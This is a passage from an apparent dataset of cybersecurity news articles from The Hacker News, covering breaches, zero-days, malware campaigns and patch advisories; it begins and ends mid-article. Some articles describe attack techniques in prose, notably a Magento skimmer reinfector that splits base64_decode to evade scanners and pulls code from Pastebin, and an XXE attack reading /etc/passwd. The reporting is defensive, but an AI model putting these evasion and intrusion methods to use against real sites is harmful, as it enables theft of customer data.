Oracle, Java is deployed across more than 3 billion systems worldwide. But the truth is that many people who have this powerful program installed simply do not need it, or only need it for very specific uses. I've repeatedly encouraged readers to uninstall this program, not only because of the constant updating it requires, but also because there seem to be a never-ending supply of new exploits available for recently-patched or undocumented vulnerabilities in the program. ",Vulnerability International Organization For Migration database hacked by Inj3ct0r Team for GREEN LIBYA,https://thehackernews.com/2011/07/international-organization-for.html,"International Organization For Migration database hacked by Inj3ct0r Team for GREEN LIBYA Inj3ct0r Team Hackers hack the database of International Organization For Migration database (https://www.iom.int/) . Statement by Hacker ""Sorry about the usernames and passwords not giving because we take no responsibility of defacing their database and official website.. But we want to deliver them the message that they're still publishing lies and trying to give a bad image about what's going in libya. Rooted and exposed for the pride of GREEN LIBYA and Supporting the green libyan nation."" Data leaked By Hackers Database : MySQL (MM MySQL JDBC) Database driver : com.mysql.jdbc.Driver Database URL : jdbc:mysql://localhost/jahia?useUnicode=true&characterEncoding=UTF-8 2) Database : Orcale 9.x - 10.x Database driver : oracle.jdbc.driver.OracleDriver Database URL : jdbc:oracle:thin:@localhost:1521:jahia 3) Database : PostgreSQL 7.4.x Database driver : org.postgresql.Driver Database URL : jdbc:postgresql:jahia 4) Database : SQL Server jTDS JDBC Drivers Database driver : net.sourceforge.jtds.jdbc.Driver Database URL : jdbc:jtds:sqlserver://localhost:1433/jahia Proof of HACK : ",Vulnerability Adobe Reader zero-day vulnerability with modified Blackhole Exploit-Kit,https://thehackernews.com/2012/11/adobe-reader-zero-day-vulnerability.html,"Group-IB, a Russian cybercrime investigation company has discovered a zero-day vulnerability, affects Adobe Reader X and Adobe Reader XI. The vulnerability is also included in new modified version of Blackhole Exploit-Kit, which is used for the distributing the banking Trojans (Zeus, Spyeye, Carberp, Citadel) with the help of exploitation different vulnerabilities in client-side software. The particular exploit is available in underground forums for as much as $50,000 and bug is dangerous because it permits cybercriminals to run arbitrary shellcode by bypassing the sandbox feature integrated into the more recent versions of Adobe Reader. For now this flaw is distributed only in only small circles of the underground but it has the potential for much larger post-exploitation methods. The exploit is limited to Microsoft Windows installations of Adobe Reader and it can't be fully executed until the user closes his Web browser (or Reader). Adobe representatives said that they were not aware of the issue. If Group IB's discovery is confirmed and Adobe patches it, it would end the software maker's two year run on zero real attacks against the sandboxed versions of Reader. Proof-of-concept (POC) video demonstrate on YouTube by Group-IB: ",Vulnerability Another Critical RCE Flaw Discovered in SolarWinds Orion Platform,https://thehackernews.com/2021/03/solarwinds-orion-vulnerability.html,"IT infrastructure management provider SolarWinds on Thursday released a new update to its Orion networking monitoring tool with fixes for four security vulnerabilities, counting two weaknesses that could be exploited by an authenticated attacker to achieve remote code execution (RCE). Chief among them is a JSON deserialization flaw that allows an authenticated user to execute arbitrary code via the test alert actions feature available in the Orion Web Console, which lets users simulate network events (e.g., an unresponsive server) that can be configured to trigger an alert during setup. It has been rated critical in severity. A second issue concerns a high-risk vulnerability that could be leveraged by an adversary to achieve RCE in the Orion Job Scheduler. ""In order to exploit this, an attacker first needs to know the credentials of an unprivileged local account on the Orion Server,"" SolarWinds said in its release notes. The advisory is light on technical specifics, but the two shortcomings are said to have been reported via Trend Micro's Zero Day Initiative. Besides the aforementioned two flaws, the update squashes two other bugs, including a high-severity stored cross-site scripting (XSS) vulnerability in the ""add custom tab"" within customize view page (CVE-2020-35856) and a reverse tabnabbing and open redirect vulnerability in the custom menu item options page (CVE-2021-3109), both of which require an Orion administrator account for successful exploitation. The new update also brings a number of security improvements, with fixes for preventing XSS attacks and enabling UAC protection for Orion database manager, among others. The latest round of fixes arrives almost two months after the Texas-based company addressed two severe security vulnerabilities impacting Orion Platform (CVE-2021-25274 and CVE-2021-25275), which could have been exploited to achieve remote code execution with elevated privileges. Orion users are recommended to update to the latest release, ""Orion Platform 2020.2.5,"" to mitigate the risk associated with the security issues. ",Vulnerability Finland's Ministry of Foreign Affairs networks hit by sophisticated Malware attack,https://thehackernews.com/2013/11/Finland-Ministry-Foreign-Affairs-malware-espionage-red-october.html,"Finnish commercial broadcaster MTV3 reports that the Finnish Ministry of Foreign Affair networks has been targeted in a four-year-long cyber espionage operation. Finland's foreign minister said, ""I can confirm there has been a severe and large hacking in the ministry's data network,"" A large scale spying attack targeted the communications between Finland and the European Union using a malware, similar to, and more sophisticated than Red October. The breach was uncovered during the early part of this year. MTV3 also mentioned that the breach was not discovered by the Finns themselves, but from a foreign tip-off reported to CERT.FI. Further the Finnish authorities kept the information under wraps for continuing the forensics. There are indications that information with the lowest level security classification has been compromised, he said. In January, 2013, we had reported about Red October Cyber-espionage operation that targeted the computer networks of various international diplomatic service agencies. According security experts from Kaspersky Lab, the cyber-espionage campaign was started since 2007 and is still active. It is possible that Red October has been just one campaign from the same actor, and there could be others that haven't been discovered yet. According to experts, Red October's exploits appear to have Chinese origins, whereas the malware modules may have a Russian background. So if this Finnish malware attack somewhere linked to Red October, then Russia and China are suspected of responsibility for the snooping. Red October malware was sent via a spear-phishing email and has been tempting its targets into letting it exploit a number of relatively minor security vulnerabilities in programs such as Microsoft's Excel and Word, as well as poisoned PDFs and Java exploits. Besides Finland, other countries could be the victim of the same attack. The Finnish Security Intelligence Service is investigating the matter. ",Malware Cisco Issues Security Patch Updates for 32 Flaws in its Products,https://thehackernews.com/2018/09/cisco-patch-updates.html,"Cisco today released thirty security patch advisory to address a total of 32 security vulnerabilities in its products, three of which are rated critical, including the recently disclosed Apache Struts remote code execution vulnerability that is being exploited in the wild. Out of the rest 29 vulnerabilities, fourteen are rated high and 15 medium in severity, addressing security flaws in Cisco Routers, Cisco Webex, Cisco Umbrella, Cisco SD-WAN Solution, Cisco Cloud Services Platform, Cisco Data Center Network, and more products. The three critical security vulnerabilities patched by Cisco address issues in Apache Struts, Cisco Umbrella API, and Cisco RV110W, RV130W and RV215W router's management interface. Apache Struts Remote Code Execution Vulnerability (CVE-2018-11776) The vulnerability, reported late last month by Semmle security researcher Man Yue Mo, resides in the core of Apache Struts and originates due to insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations. ""The vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action,"" Cisco explains in its advisory. ""In cases where upper actions or configurations also have no namespace or a wildcard namespace, an attacker could exploit this vulnerability by sending a request that submits malicious input to the affected application for processing."" An unauthenticated, remote attacker can trigger the vulnerability by tricking victims to visit a specially crafted URL on the affected web server, allowing the attacker to execute malicious code and eventually take complete control over the targeted server running the vulnerable application. All applications that use Apache Struts—supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions—are potentially vulnerable to this flaw, even when no additional plugins have been enabled. Apache Struts patched the vulnerability with the release of Struts versions 2.3.35 and 2.5.17 last month. Now, Cisco has also released fixes to address the issue in its several products. You can check the list of vulnerable Cisco products here. Since there are no workarounds for this issue, organizations and developers are strongly advised to update their Struts components as soon as possible. Cisco Umbrella API Unauthorized Access Vulnerability (CVE-2018-0435) The second critical vulnerability patched by Cisco resides in the Cisco Umbrella API that could allow an authenticated, remote attacker to view and modify data across their organization as well as other organizations. Cisco Umbrella is a cloud security platform that provides the first line of defense against threats over all ports and protocols by blocking access to malicious domains, URLs, IPs, and files before a connection is ever established or a file is downloaded. The vulnerability resides due to insufficient authentication configurations for the API interface of Cisco Umbrella, and successful exploitation could allow an attacker to read or modify data across multiple organizations. Cisco has patched the vulnerability addressed this vulnerability in the Cisco Umbrella production APIs. No user action is required. Cisco Routers Management Interface Buffer Overflow Vulnerability (CVE-2018-0423) The last, but not the least, critical vulnerability resides in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router that could allow an unauthenticated, remote attacker to execute arbitrary code or cause a DoS condition. The flaw occurs due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. To exploit this vulnerability, an attacker can send malicious requests to a targeted device, triggering a buffer overflow condition. ""A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code,"" the company explains. This vulnerability affects all releases of Cisco RV110W Wireless-N VPN Firewall, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router. Cisco has addressed this vulnerability in firmware release 1.0.3.44 for the Cisco RV130W Wireless-N Multifunction VPN Router, and will not release firmware updates for the Cisco RV110W Wireless-N VPN Firewall and Cisco RV215W Wireless-N VPN Router. According to the company's Product Security Incident Response Team (PSIRT), Apache Struts is being exploited in the wild, while the team is not aware of any exploits leveraging the other two critical flaws. The Bottom Line: Patch! Patch! Patch! ",Vulnerability Pre-Installed Password Manager On Windows 10 Lets Hackers Steal All Your Passwords,https://thehackernews.com/2017/12/windows-10-password-manager.html,"If you are running Windows 10 on your PC, then there are chances that your computer contains a pre-installed 3rd-party password manager app that lets attackers steal all your credentials remotely. Starting from Windows 10 Anniversary Update (Version 1607), Microsoft added a new feature called Content Delivery Manager that silently installs new ""suggested apps"" without asking for users' permission. According to a blog post published Friday on Chromium Blog, Google Project Zero researcher Tavis Ormandy said he found a pre-installed famous password manager, called ""Keeper,"" on his freshly installed Windows 10 system which he downloaded directly from the Microsoft Developer Network. Ormandy was not the only one who noticed the Keeper Password Manager. Some Reddit users complained about the hidden password manager about six months ago, one of which reported Keeper being installed on a virtual machine created with Windows 10 Pro. Critical Flaw In Keeper Password Manager Knowing that a third-party password manager now comes installed by default on Windows 10, Ormandy started testing the software and took no longer to discover a critical vulnerability that leads to ""complete compromise of Keeper security, allowing any website to steal any password."" ""I don't want to hear about how even a password manager with a trivial remote root that shares all your passwords with every website is better than nothing. People really tell me this,"" Ormandy tweeted. The security vulnerability in the Keeper Password Manager was almost identical to the one Ormandy discovered and reported in the non-bundled version of the same Keeper plugin in August 2016 that enabled malicious websites to steal passwords. ""I checked and, they're doing the same thing again with this version. I think I'm being generous considering this a new issue that qualifies for a ninety day disclosure, as I literally just changed the selectors and the same attack works,"" Ormandy said. To explain the severity of the bug, Ormandy also provided a working proof-of-concept (PoC) exploit that steals a user's Twitter password if it is stored in the Keeper app. Install Updated Keeper Password Manager Ormandy reported the vulnerability to the Keeper developers, who acknowledged the issue and released a fix in the just released version 11.4 on Friday by removing the vulnerable ""add to existing"" functionality. Since the vulnerability only affects version 11 of the Keeper app, which was released on December 6 as a major browser extension update, the vulnerability is different from the one Ormandy reported six months ago. Keeper has also added that the company has not noticed any attack using this security vulnerability in the wild. As for Windows 10 users, Ormandy said users wouldn't be vulnerable to the password theft unless they open Keeper password manager and enable the software to store their passwords. However, Microsoft still needs to explain how the Keeper password manager gets installed on the users' computers without their knowledge. Meanwhile, users can use this registry tweak to disable Content Delivery Manager in order to prevent Microsoft from installing unwanted apps silently on their PCs. ",Vulnerability These Top 7 Brutal Cyber Attacks Prove 'No One is Immune to Hacking' — Part I,https://thehackernews.com/2015/09/top-cyber-attacks-1.html,"If you believe that your organization is not at real risk of cyber attack, then you are absolutely wrong. Incidents of massive data breaches, advanced cyber attacks coming from China, groups like Syrian Electronic Army, Hacking Point of Sale machines at retailers such as Target have splashed across the news in the last one year. Whether a Government Agency or Private Company, Small or a Large Tech Company.... ...It's no secret that No one is Immune to Cyber Attacks. This article is the first in a two-part series from The Hacker News, listing first four out of Top 7 Brutal Cyber Attacks. And here we go... #1 ""Hacking Team"" Data Breach Hacking Team, the controversial spyware company, recently been hacked by some unidentified hackers that exposed over 400 gigabytes of its internal sensitive data on the Internet. Milan (Italy) based IT firm 'Hacking Team' sells intrusion and surveillance software solutions to Governments and Law Enforcement agencies worldwide. Hacking Team is infamous for its commercial surveillance tool named as Remote Control System (RCS), which is capable of spying activities and remotely accessing target system's microphone and camera. However, sometimes even Hackers get Hacked! So same happened with Hacking Team when hackers not only defaced Hacking Team's own Twitter account but also leaked: Executive Emails Source codes for Hacking and Spyware Tools Zero-day exploits, including for Flash, Internet Explorer Government client list with date of purchase and amount paid …Marking the attack as one of the biggest cyber attacks on any Company. One of the aspects of the data breach showed the lack of protection implementations within the organization and using weak passwords. #2 Ashley Madison Data Breach TIP: No website can guarantee privacy of your identity, Credit card details, personal photos or any other information. [Read more] Two months ago, Toronto-based Ashley Madison website, popular as an online Married Dating portal for extramarital affairs with the tagline ""Life is Short. Have an Affair,"" was hacked by 'The Impact Team'. Hackers allegedly gained access to millions of its customers information database and posted 10GB of personal data for its tens of Millions of customers, including their names and email addresses. Frequently followed by another leak, where hackers released another 20GB of company's internal data, including personal e-mails from the CEO of Ashley Madison parent company Avid Life, Noel Biderman, along with the source code for its website and mobile apps. The breach came just two months after an attack on another scandalous site, Adult Friend Finder where again millions of people's very personal data were left exposed on the Internet. The Ashley Madison and Adult Friend Finder hacking cases raise serious questions about what these dating websites are doing to ensure the security of their users' personal information. #3 The Sony Pictures Hack Remember last year when you were able to download and watch unreleased movies of Sony Pictures Entertainment? Annie, Mr. Turner, Still Alice, To Write Love On Her Arms, and Brad Pitt's ""Fury""... ...were leaked online on torrent websites, following a massive cyber attack on Sony Pictures last year by the Guardians of Peace (GOP) hacking group. The hack wasn't limited to unreleased movies — the unknown hackers leaked about 200 gigabytes of confidential data belonging to Sony Pictures from movie scripts to sensitive employees data, celebrity's' phone numbers and their travel aliases, making it the most severe hack in the History. The massive cyber attack on the company was in response to the release of ""The Interview"" — a controversial North Korean-baiting film, where hackers threatened 9/11 Type attack at Theaters showing this movie. As a result, Sony had to shut down its services for weeks. However, it struggled to solve the issue by pulling ""The Interview"" from theaters and eventually putting it up on Netflix. But, things have not changed much for Sony. This was the second time Sony was targeted, and the intensity of the attack was such that even after taking the best measures, a subsequent amount of the company's data was leaked to WikiLeaks. #4 'Fappening' and 'Snappening' When a surge of Nude Photos of Celebrities were leaked and went viral in August of 2014, the Internet had a meltdown. Unknown Hacker was able to break into third-party applications connected to services like Facebook, Twitter, Instagram and Apple's iCloud that led to a major incident known as ""The Fappening"". The Fappening mainly attacked female celebrities and leaked very private photographs of them, including Jennifer Lawrence, Kim Kardashian, Kirsten Dunst, Avril Lavigne and many others. Within a month of ""The Fappening,"" another similar incident called ""The Snappening"" happened that leaked more than 100,000 nude videos and images of the Snapchat users. In The Fappening, the Naked Pictures were allegedly retrieved due to a ""brute force"" security flaw in Apple's iCloud file storage service. However, Apple denied it. In case of The Snappening, Snapchat's servers were not breached. Instead, the nude pictures of users were compromised due to third-party apps used to send and receive Snaps. However, both the incidents marked as the biggest hacks of one of its kind. Further Read: Part II — Top 7 Brutal Cyber Attacks Proves that No One is Immune to Hacking. ",Data_Breaches Emotet Malware Destroys Itself From All Infected Computers,https://thehackernews.com/2021/04/emotet-malware-destroys-itself-today.html,"Emotet, the notorious email-based Windows malware behind several botnet-driven spam campaigns and ransomware attacks, was automatically wiped from infected computers en masse following a European law enforcement operation. The development comes three months after a coordinated disruption of Emotet as part of ""Operation Ladybird"" to seize control of servers used to run and maintain the malware network. The orchestrated effort saw at least 700 servers associated with the botnet's infrastructure neutered from the inside, thus preventing further exploitation. Law enforcement authorities from the Netherlands, Germany, the U.S., U.K., France, Lithuania, Canada, and Ukraine were involved in the international action. Previously, the Dutch police, which seized two central servers located in the country, said it had deployed a software update to counter the threat posed by Emotet effectively. ""All infected computer systems will automatically retrieve the update there, after which the Emotet infection will be quarantined,"" the agency noted back in January. This involved pushing a 32-bit payload named ""EmotetLoader.dll"" via the same channels that were used to distribute the original Emotet to all compromised machines. The cleanup routine, which was set to trigger itself automatically on April 25, 2021, worked by removing the malware from the device, in addition to deleting the autorun Registry key and terminating the process. Now on Sunday, cybersecurity firm Malwarebytes confirmed that its Emotet-infected machine that had received the specially-crafted time bomb code had successfully initiated the uninstallation routine and removed itself from the Windows system. As of writing, Abuse.ch's Feodo Tracker shows none of the Emotet servers are online. However, it remains to be seen if this ""final"" blow to the botnet will cause it to bounce back in the future or render it permanently inoperable, paving the way for other cybercrime actors to fill the void. ""Historically, Emotet's operators used long breaks in activity to improve their malware,"" Redscan researchers noted on Friday. ""This means there is a realistic possibility that Emotet's operators will use this opportunity to make the loader malware even more resilient, for example, by using polymorphic techniques to counter future coordinated action. They could also use the Emotet source code to branch off and create smaller, independent botnets."" The mass action marks the second time law enforcement agencies have intervened to remove malware from compromised machines. Earlier this month, the U.S. government took steps to remove web shell backdoors dropped by the Hafnium threat actor from Microsoft Exchange servers located in the country that were breached using ProxyLogon exploits. Following the court-authorized operation, the Federal Bureau of Investigation said it's in the process of notifying all the organizations from which it had removed web shells, implying the intelligence agency accessed the systems without their knowledge. ",Malware 16-Year-Old Teenager arrested for World's biggest cyber attack ever,https://thehackernews.com/2013/09/16-year-old-teenager-arrested-for.html,"16-Year-Old Teenager has been arrested over his alleged involvement in the World's biggest largest DDoS attacks against the Dutch anti-spam group Spamhaus. The teenager, whose name is unknown at this point, was arrested by British police in April, but details of his arrest were just leaked to the British press on Thursday. He was taken into custody when police swooped on his south-west London home after investigations identified significant sums of money were flowing through his bank account. The suspect was found with his computer systems open and logged on to various virtual systems and forums. The March 20 attack on Spamhaus has been dubbed as the ""biggest cyber attack in the history of the Internet"" which saw server of the Dutch anti-spam organization being bombarded with traffic in tune of 300 billion bits per second (300Gbps). A DDoS attack takes place when hackers use an army of infected computers to send traffic to a server, causing a shutdown in the process. It's unclear what role the teenager played in the massive distributed denial of service (DDoS) attack. The boy has been released on bail until later this year. A 35-year-old Dutchman was detained and his computers, data carriers and mobile phones were seized, local media speculates that the person is none other than CyberBunker spokesman Sven Olaf Kamphuis. The attack on Spamhaus is believed to have started after the anti-spam organization blacklisted CyberBunker for allegedly spreading spam. ",Cyber_Attack New Banking malware 'i2Ninja' being sold via underground Russian Cybercrime Market,https://thehackernews.com/2013/11/new-banking-malware-i2ninja-being-sold.html,"Researchers at Trusteer spotted a new banking malware program on the underground Russian cybercrime market, that communicates with attackers over the I2P anonymity network is for sale on underground Russian cybercrime forums. Dubbed 'i2Ninja', malware has most of the features found in other financial malware including the ability to perform HTML injections and form grabbing in Internet Explorer, Firefox and Chrome. i2Ninja can also steal FTP and e-mail credentials. It also has a PokerGrabber module feature that targets poker sites. The traffic between the malware and the command server cannot be easily blocked by intrusion prevention systems or firewalls because it's encrypted and transmitting over the Invisible Internet Project (I2P). Everything from delivering configuration updates to receiving stolen data and sending commands is done via the encrypted I2P channels. I2P communication can make it much harder for security researchers to find and take down those servers and the malware also offers buyers a proxy for anonymous Internet browsing, promising complete online anonymity. Another unique feature of this malware is that it comes with an integrated help desk ticketing system. ""A potential buyer can communicate with the authors / support team, open tickets and get answers - all while enjoying the security and anonymity provided by I2P's encrypted messaging nature,"" Trusteer says. The few other malware also has such marketed support i.e. Citadel and the Neosploit Exploit Pack. It's not known if i2Ninja is already being used to infect computers. With increasing black market activity and the release of various malware source code, we expect to see a new malware variants and new underground offering in 2014, they say. ",Malware Magento Hackers Using Simple Evasion Trick to Reinfect Sites With Malware,https://thehackernews.com/2018/06/magento-security-hacking.html,"Security researchers have been warning of a new trick that cybercriminals are leveraging to hide their malicious code designed to re-introduce the infection to steal confidential information from Magento based online e-commerce websites. So, if you have already cleaned up your hacked Magento website, there are chances your website is still leaking login credentials and credit card details of your customers to hackers. More than 250,000 online stores use open-source Magento e-commerce platform, which makes them an enticing target for hackers, and therefore the security of both your data and your customer data is of the utmost importance. According to the researchers at Sucuri, who have previously spotted several Magento malware campaigns in the wild, cybercriminals are currently using a simple yet effective method to ensure that their malicious code is added back to a hacked website after it has been removed. To achieve this, criminals are hiding their 'credit card stealer reinfector' code inside the default configuration file (config.php) of Magento website, which gets included on the main index.php and loads with every page view, eventually re-injecting the stealer code into multiple files of the website. Since config.php file gets automatically configured while installing Magento CMS, usually it is not recommended for administrators or website owners to change the content of this file directly. Here's How Magento's Reinfector Code Works The reinfector code spotted by researchers is quite interesting as it has been written in a way that no security scanner can easily identify and detect it, as well as it hardly looks malicious for an untrained eye. Hackers have added 54 extra lines of code in the default configuration file. Here below, I have explained the malicious reinfector code line-by-line, shown in the screenshots, written inside the default config.php file. At line no. 27, attackers set error_reporting() function to false in an attempt to hide errors messages that could reveal the path of the malicious module to site admins. From line no. 31 to 44, there's a function called patch() that has been programmed to append the malicious code for stealing confidential information into legitimate Magento files. This patch() function uses 4 arguments, values of which defines the path of a folder, name of a specific file resides in that path needs to be infected, file size required to check if it is necessary to reinfect the given file, a new file name to be created, and a remote URL from where the malicious code will be downloaded in real-time and injected into the targeted file. From line 50 to 51, attackers have smartly split up the base64_decode() function in multiple parts in order to evade detection from security scanners. The line 52 includes a base64 encoded value that converts to ""https://pastebin.com/raw/"" after getting decoded using the function defined in line 50-51. The next four sets of variables from line 54 to 76 define the four values required to pass arguments to the patch() function mentioned above. The last line of each set includes a random eight character value that concatenated with the link variable encoded in line 52, which eventually generates the final URL from where the patch() function will download the malicious code hosted on remote Pastebin website. From line 78 to 81, attacker finally executes patch() function four times with different values defined in line 54-76 to reinfect website with the credit card stealer. ""As a rule of thumb, on every Magento installation where a compromise is suspected to have taken place, the /includes/config.php should be verified quickly,"" researchers advise. It should be noted that similar technique can also be used against websites based on other content management system platforms such as Joomla and WordPress to hide malicious code. Since attackers mostly exploit known vulnerabilities to compromise websites at the very first place, users are always recommended to keep their website software and servers updated with the latest security patches. ",Malware "LuckyMouse Hackers Target Banks, Companies and Governments in 2020",https://thehackernews.com/2021/04/luckymouse-hackers-target-banks.html,"An adversary known for its watering hole attacks against government entities has been linked to a slew of newly detected intrusions targeting various organizations in Central Asia and the Middle East. The malicious activity, collectively named ""EmissarySoldier,"" has been attributed to a threat actor called LuckyMouse, and is said to have happened in 2020 with the goal of obtaining geopolitical insights in the region. The attacks involved deploying a toolkit dubbed SysUpdate (aka Soldier) in a number of breached organizations, including government and diplomatic agencies, telecom providers, a TV media company, and a commercial bank. LuckyMouse, also referred to as APT27 and Emissary Panda, is a sophisticated cyberespionage group that has a history of breaching multiple government networks in Central Asia and the Middle East. The actor has also been linked to cyberattacks aimed at transnational organizations such as the International Civil Aviation Organization (ICAO) in 2019 and recently attracted attention for exploiting ProxyLogon flaws to compromise the email server of a governmental entity in the Middle East. EmissarySoldier is only the latest in a series of surveillance efforts aimed at the targets. ""In order to compromise victims, LuckyMouse typically uses watering holes, compromising websites likely to be visited by its intended targets, ESET malware researcher Matthieu Faou said in a report published today. ""LuckyMouse operators also perform network scans to find vulnerable internet-facing servers run by their intended victims."" What's more, ESET also observed LuckyMouse infections on an unspecified number of internet-facing systems running Microsoft SharePoint, which the researchers suspect occurred by taking advantage of remote code execution vulnerabilities in the application. Regardless of the method used to gain an initial foothold, the attack chain culminates in the deployment of custom post-compromise implants, SysUpdate or HyperBro, both of which leverage DLL search order hijacking to load malicious payloads and thwart detection. ""The trident model features a legitimate application vulnerable to DLL hijacking, a custom DLL that loads the payload, and a raw Shikata Ga Nai-encoded binary payload,"" Faou noted. For its part, SysUpdate functions as a modular tool, with each component devoted to a particular operational purpose. It involves abusing a benign application as a loader for a malicious DLL, which in turn loads the first-stage payload that ultimately decodes and deploys the memory implant on the compromised system. Since its discovery in 2018, the toolkit has undergone numerous revisions devoted to adding new functionalities, indicating that the operators are actively working to revamp their malware arsenal. ""LuckyMouse was increasingly active throughout 2020, seemingly going through a retooling process in which various features were being incrementally integrated into the SysUpdate toolkit,"" Faou said. ""This may be an indicator that the threat actors behind LuckyMouse are gradually shifting from using HyperBro to SysUpdate."" ",Cyber_Attack "Researchers Get $10,000 for Hacking Google Server with Malicious XML",https://thehackernews.com/2014/04/hacking-google-server-XML-External-Entity.html,"A critical vulnerability has been uncovered in Google that could allow an attacker to access the internal files of Google's production servers. Sounds ridiculous but has been proven by the security researchers from Detectify. The vulnerability resides in the Toolbar Button Gallery (as shown). The team of researchers found a loophole after they noticed that Google Toolbar Button Gallery allows users to customize their toolbars with new buttons. So, for the developers, it is easy to create their own buttons by uploading XML files containing metadata for styling and other such properties. This feature of Google search engine is vulnerable to XML External Entity (XXE). It is an XML injection that allows an attacker to force a badly configured XML parser to ""include"" or ""load"" unwanted functionality that can compromise the security of a web application. ""The root cause of XXE vulnerabilities is naive XML parsers that blindly interpret the DTD of the user supplied XML documents. By doing so, you risk having your parser doing a bunch of nasty things. Some issues include: local file access, SSRF and remote file includes, Denial of Service and possible remote code execution. If you want to know how to patch these issues, check out the OWASP page on how to secure XML parsers in various languages and platforms,"" the researchers wrote on a blog post. Using the same, the researchers crafted their own button containing fishy XML entities. By sending it, they gain access to internal files stored in one of Google's production servers and managed to read the ""/etc/passwd"" and the ""/etc/hosts"" files from the server. By exploiting the same vulnerability the researchers said they could have access any other file on their server, or could have gain access to their internal systems through the SSRF exploitation. The researchers straight away reported the vulnerability to the Google's security team and rewarded with $10,000 (€7,200) bounty for identifying an XML External Entity (XXE) vulnerability in one of the search engine's features. ",Vulnerability Poor Rowhammer Fixes On DDR4 DRAM Chips Re-Enable Bit Flipping Attacks,https://thehackernews.com/2020/03/rowhammer-vulnerability-ddr4-dram.html,"Remember rowhammer vulnerability? A critical issue affecting modern DRAM (dynamic random access memory) chips that could allow attackers to obtain higher kernel privileges on a targeted system by repeatedly accessing memory cells and induce bit flips. To mitigate Rowhammer vulnerability on the latest DDR4 DRAM, many memory chip manufacturers added some defenses under the umbrella term Target Row Refresh (TRR) that refreshes adjacent rows when a victim row is accessed more than a threshold. But it turns out 'Target Row Refresh,' promoted as a silver bullet to mitigate rowhammer attacks, is also insufficient and could let attackers execute new hammering patterns and re-enable the bit-flip attacks on the latest hardware as well. TRRespass: The Rowhammer Fuzzing Tool Tracked as CVE-2020-10255, the newly reported vulnerability was discovered by researchers at VUSec Lab, who today also released 'TRRespass,' an open source black box many-sided RowHammer fuzzing tool that can identify sophisticated hammering patterns to mount real-world attacks. According to the researchers, TRRespass fuzzer repeatedly selects different random rows at various locations in DRAM for hammering and works even when unaware of the implementation of the memory controller or the DRAM chip. What's more? The latest flaw also affects LPDDR4 and LPDDR4X chips embedded on most of the modern smartphones, leaving millions of devices still vulnerable to the RowHammer vulnerability again. ""We also ported a simplified version of TRRespass to ARM and managed to trigger bit flips on a variety of smartphones such as Google Pixel 3 and Samsung Galaxy S10,"" the researchers said. Target Row Refresh tries to identify possible victim rows by counting the number of adjacent row activations and comparing it against a predefined value, but it still is incapable of keeping the information about all accessed rows at the same time to effectively mitigate bit flips through aggressor rows. ""The known Rowhammer variants use at most two aggressor rows to perform the attack, a small number rows that are being accessed frequently can easily be monitored by TRR. But what if we use more aggressor rows?"" the researchers said in a blog post. ""But having more aggressors overwhelms the TRR mitigation since it can only track a few aggressor rows at a time. 'Luckily' DDR4 chips are more vulnerable, giving us the possibility to reduce the number of accesses to each of the aggressors to trigger bit flips. Or, in other words, to increase the number of aggressors to bypass the mitigation."" Researchers claim they ""tried TRRespass on the three major memory vendors (compromising more than 99% of the market) using 42 DIMMs,"" and found bit flips on 12 of them. VUSec team reported the new RowHammer attacks to all affected parties late last year, but, unfortunately, it is not going to be patched anytime soon. VUSec also promised to soon release an Android app that users can install and use to check whether the memory chip on their smartphones is also vulnerable to the new hammering patterns or not. ",Vulnerability Beware! Playing Untrusted Videos On VLC Player Could Hack Your Computer,https://thehackernews.com/2019/06/vlc-media-player-hacking.html,"If you use VLC media player on your computer and haven't updated it recently, don't you even dare to play any untrusted, randomly downloaded video file on it. Doing so could allow hackers to remotely take full control over your computer system. That's because VLC media player software versions prior to 3.0.7 contain two high-risk security vulnerabilities, besides many other medium- and low-severity security flaws, that could potentially lead to arbitrary code execution attacks. With more than 3 billion downloads, VLC is a hugely popular open-source media player software that is currently being used by hundreds of millions of users worldwide on all major platforms, including Windows, macOS, Linux, as well as Android and iOS mobile platforms. Discovered by Symeon Paraschoudis from Pen Test Partners and identified as CVE-2019-12874, the first high-severity vulnerability is a double-free issue which resides in ""zlib_decompress_extra"" function of VideoLAN VLC player and gets triggered when it parses a malformed MKV file type within the Matroska demuxer. The second high-risk flaw, identified as CVE-2019-5439 and discovered by another researcher, is a read-buffer overflow issue that resides in ""ReadFrame"" function and can be triggered using a malformed AVI video file. Though the proof-of-concepts demonstrated by both researchers cause a crash, a potential attacker can exploit these vulnerabilities to achieve arbitrary code execution with the same privileges as of the target user on the system. All the attacker needs to do is craft a malicious MKV or AVI video file and trick users into playing it using the vulnerable versions of VLC. Well, that's not a tough job, as attackers can easily target hundreds of thousands of users within hours by simply releasing malicious video files on torrent sites, mimicking as a pirated copy of a newly released movie or TV series. According to an advisory released by VideoLAN, having ASLR and DEP protections enabled on the system could help users mitigate the threat, but developers did admit that these protections could be bypassed too. Paraschoudis used honggfuzz fuzzing tool to discover this issue and four other bugs, which were also patched by the VideoLAN team earlier this month along with 28 other bugs reported by other security researchers through EU-FOSSA bug bounty program. Users are highly recommended to update their media player software to VLC 3.0.7 or later versions and should avoid opening or playing video files from untrusted third parties. ",Vulnerability Microsoft Says Its Systems Were Also Breached in Massive SolarWinds Hack,https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html,"The massive state-sponsored espionage campaign that compromised software maker SolarWinds also targeted Microsoft, as the unfolding investigation into the hacking spree reveals the incident may have been far more wider in scope, sophistication, and impact than previously thought. News of Microsoft's compromise was first reported by Reuters, which also said the company's own products were then used to strike other victims by leveraging its cloud offerings, citing people familiar with the matter. The Windows maker, however, denied the threat actor had infiltrated its production systems to stage further attacks against its customers. In a statement to The Hacker News via email, the company said — ""Like other SolarWinds customers, we have been actively looking for indicators of this actor and can confirm that we detected malicious SolarWinds binaries in our environment, which we isolated and removed. We have not found evidence of access to production services or customer data. Our investigations, which are ongoing, have found absolutely no indications that our systems were used to attack others."" Characterizing the hack as ""a moment of reckoning,"" Microsoft president Brad Smith said it has notified over 40 customers located in Belgium, Canada, Israel, Mexico, Spain, the UAE, the UK, and the US that were singled out by the 